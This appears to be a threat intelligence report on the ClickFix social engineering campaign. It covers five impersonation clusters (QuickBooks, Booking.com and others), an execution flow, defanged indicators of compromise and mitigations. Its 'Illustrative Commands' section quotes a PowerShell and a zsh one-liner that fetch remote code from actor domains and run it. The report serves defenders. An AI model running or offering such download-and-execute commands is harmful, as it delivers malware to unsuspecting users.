Executive Summary
The Insikt Group’s latest intelligence reveals a sophisticated, multi‑cluster social engineering campaign known as ClickFix. Leveraging deceptive interfaces that mimic trusted applications such as Intuit QuickBooks and Booking.com, the threat actors compel victims to manually execute obfuscated commands within native system tools. This technique, which bypasses conventional browser and endpoint defenses, has evolved into a high‑return template adopted by both low‑tier attackers and advanced persistent threat (APT) groups. The following report presents the technical landscape, operational clusters, indicators of compromise, and actionable mitigations.
Threat Landscape
ClickFix utilizes a living‑off‑the‑land (LotL) approach: malicious scripts are delivered in‑memory through legitimate binaries (e.g., Windows Run dialog, PowerShell, macOS Terminal). The campaign’s core TTPs align with MITRE ATT&CK techniques T1059, T1218, and T1547. Actors manipulate users into copying and pasting encoded payloads, thereby evading standard signature‑based detection.
Five Distinct Clusters
Insikt Group identified five clusters, each targeting different sectors but sharing the same execution framework:
- Intuit QuickBooks (Accounting) – impersonates QuickBooks during tax season.
- Booking.com (Travel) – presents fake reCAPTCHA challenges.
- Birdeye (AI Marketing) – exploits Cloudflare‑protected domains.
- Dual‑Platform Selection – OS detection delivers tailored Windows or macOS lures.
- macOS Storage Cleaning – masquerades as system optimization utilities.
Technical Execution Flow
The standardized four‑stage pattern is consistent across platforms:
- Obfuscated Input – highly encoded strings (hex, base64) are presented to the user.
- Native Execution – users paste the command into trusted shells (PowerShell, zsh, bash).
- Remote Ingress – scripts fetch secondary payloads from actor‑controlled domains.
- In‑Memory Execution – payloads are piped directly into interpreters, leaving minimal on‑disk artifacts.
Illustrative Commands
PowerShell example (Cluster 1): powershell -NoProfile -ExecutionPolicy Bypass -c "&{Invoke‑RestMethod -Uri 'hxxps://nobovcs[.]com/stage' | Invoke‑Expression}"
macOS example (Cluster 4): zsh -c "echo '-kfsSL https://octopox[.]com/download' | sh"
Indicators of Compromise
Below is a sanitized representation of key IOC tables. IP addresses have been bracketed, and URLs are obfuscated with hxxps.
Cluster 1 – Intuit QuickBooks
| Domain | IP Address | First Seen | Last Seen |
|---|---|---|---|
| mrinmay[.]net | 193[.]35[.]17[.]12 | 2026-02-21 | 2026-03-05 |
| ariciversontile[.]com | 193[.]35[.]17[.]12 | 2026-02-20 | 2026-02-25 |
Cluster 2 – Booking.com
| Domain | IP Address | First Seen | Last Seen |
|---|---|---|---|
| sign-in-op-token[.]com | 91[.]202[.]233[.]206 | 2026-03-01 | 2026-03-03 |
| thestayreserve[.]com | 91[.]202[.]233[.]206 | 2026-02-23 | 2026-02-24 |
Cluster 3 – Birdeye
| Domain | First Seen | Last Seen |
|---|---|---|
| birdrankbox[.]com | 2024-05-16 | 2026-03-05 |
Cluster 4 – Dual‑Platform Selection
| Domain | IP Address | First Seen | Last Seen |
|---|---|---|---|
| macosapp-apple[.]com | 45[.]144[.]233[.]192 | 2025-11-12 | 2026-03-05 |
Cluster 5 – macOS Storage Cleaning
| Domain | IP Address | First Seen | Last Seen |
|---|---|---|---|
| macos-storageperf[.]com | Cloudflare | 2026-02-06 | 2026-03-05 |
Mitigation Recommendations
Defenders should adopt a layered, behavior‑centric approach:
- Disable Windows Run Dialog – Group Policy:
Win+Rand Run command removal. - PowerShell Constrained Language Mode – restrict script execution to CLM.
- AppLocker / WDAC Policies – block untrusted LOLBins.
- macOS Shell Controls – enforce SIP and restrict Terminal via MDM.
- User Awareness Training – simulate malicious copy‑paste scenarios.
- Threat Intelligence Integration – feed IPs and domain hashes into SIEM/EDR.
- HTML Content Analysis – monitor brand impersonation sites using Recorded Future.
Outlook
Given the campaign’s rapid evolution, future iterations are expected to incorporate fine‑grained browser fingerprinting and more obfuscated staging scripts. Attackers will likely continue to rely on user‑facilitated execution to sidestep hardened endpoint defenses. Continuous monitoring of HTML artifacts and aggressive hardening of native utilities remain the most effective countermeasures.

